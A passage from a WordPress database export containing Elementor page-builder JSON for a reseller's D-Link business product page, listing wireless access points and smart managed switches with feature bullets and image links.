]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7403,3386,'_elementor_version','2.5.14'),(7404,3386,'_elementor_edit_mode','builder'),(7407,3387,'_wp_page_template','template-fullwidth.php'),(7408,3387,'_elementor_template_type','post'),(7409,3387,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"158\",\"right\":\"158\",\"bottom\":\"158\",\"left\":\"158\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access 